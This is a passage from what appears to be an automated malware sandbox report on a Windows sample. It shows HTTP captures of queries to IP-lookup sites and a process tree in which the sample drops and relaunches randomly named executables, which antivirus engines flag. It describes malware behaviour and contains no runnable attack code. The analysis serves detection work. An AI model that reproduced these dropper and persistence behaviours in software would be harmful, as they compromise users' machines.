                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.821599007 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 39 33 62 64 66 33 37 62 33 64 39 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d30393bdf37b3d9</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    58192.168.11.3049945172.67.155.17580
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.122663021 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.265491962 CEST886INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:57 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:57 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OOe%2Bj4IyycODoogW6MsBTXwcmKSDXfMCrodaZslDpm%2F%2B7%2Bq9mzXWf9ungYjlo2p2080GOBH1sajl16eWywOXkzU%2FoMAVTNjgYmSNf0%2FlJlEKbRwkIQnr76vr1MF2kf%2FppTncOU80pYtcUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30395169413341-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    59192.168.11.3049954104.19.223.7980
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.746777058 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.891834021 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:41:03 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:41:18 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=qgCPNQUvA4T.cuX9sKX0Um1PtriHgV4WWFUpziUwxXA-1728999663-1.0.1.1-xPz__GkVFyYCwbohpRkZ38DVrzQqFLK87DxAEnqYExO85Tz2xdmqOlo4OYcjMUx9ex1Qa3z5o11wjzex6Zksmw; path=/; expires=Tue, 15-Oct-24 14:11:03 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30397acb3874a2-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.891918898 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.891963959 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.892040014 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 39 37 61 63 62 33 38 37 34 61 32 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d30397acb3874a2</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    60192.168.11.3049959104.19.223.7980
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.323862076 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.467257977 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:41:07 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:41:22 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=kKmo4ROCqHNKLtwsO9p2yfQAbjF3Px2ckXqGlFgvJYA-1728999667-1.0.1.1-MBsL9KJP394uCiIBBbJeFsnWNcCkO_SuZzg_H1OysuvtKR_FzZvYdFGlmljjIIBLvu_zSabsndOdF4NqwL21hQ; path=/; expires=Tue, 15-Oct-24 14:11:07 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3039912c2e0a0e-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.467370033 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.467385054 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.467396975 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 39 39 31 32 63 32 65 30 61 30 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d3039912c2e0a0e</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:09:38:44
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\HqvlYZC7Gf.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\HqvlYZC7Gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:1'040'384 bytes
                                                                                                                                                                                                                                                    MD5 hash:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                    Start time:09:38:47
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe*"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                    Start time:09:38:53
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\zjisvko.exe" "-C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:737'280 bytes
                                                                                                                                                                                                                                                    MD5 hash:6B760F8FDCB57B4FEFC1487B46EF20CD
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                    Start time:09:38:53
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\zjisvko.exe" "-C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:737'280 bytes
                                                                                                                                                                                                                                                    MD5 hash:6B760F8FDCB57B4FEFC1487B46EF20CD
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                    Start time:09:38:59
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\ojtoccrezqmarmjwql.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\ojtoccrezqmarmjwql.exe" .
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:1'040'384 bytes
                                                                                                                                                                                                                                                    MD5 hash:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 97%, ReversingLabs
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                    Start time:09:39:00
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\ojtoccrezqmarmjwql.exe*."
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                    Start time:09:39:07
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe" .
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:1'040'384 bytes
                                                                                                                                                                                                                                                    MD5 hash:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    • Detection: 97%, ReversingLabs
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                                    Start time:09:39:08
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\appdata\local\temp\bzmkbewmkeduommczxkiz.exe*."
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                                    Start time:09:39:15
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\mjvsikbqngeunkjyurda.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\mjvsikbqngeunkjyurda.exe" .
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:1'040'384 bytes
                                                                                                                                                                                                                                                    MD5 hash:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 97%, ReversingLabs
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                    Start time:09:39:16
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\mjvsikbqngeunkjyurda.exe*."
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                                    Start time:09:39:24
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe" .
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:1'040'384 bytes
                                                                                                                                                                                                                                                    MD5 hash:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    • Detection: 97%, ReversingLabs
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                                    Start time:09:39:24
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\appdata\local\temp\mjvsikbqngeunkjyurda.exe*."
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                    Start time:09:39:32
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\yrzsecpaticodwrc.exe
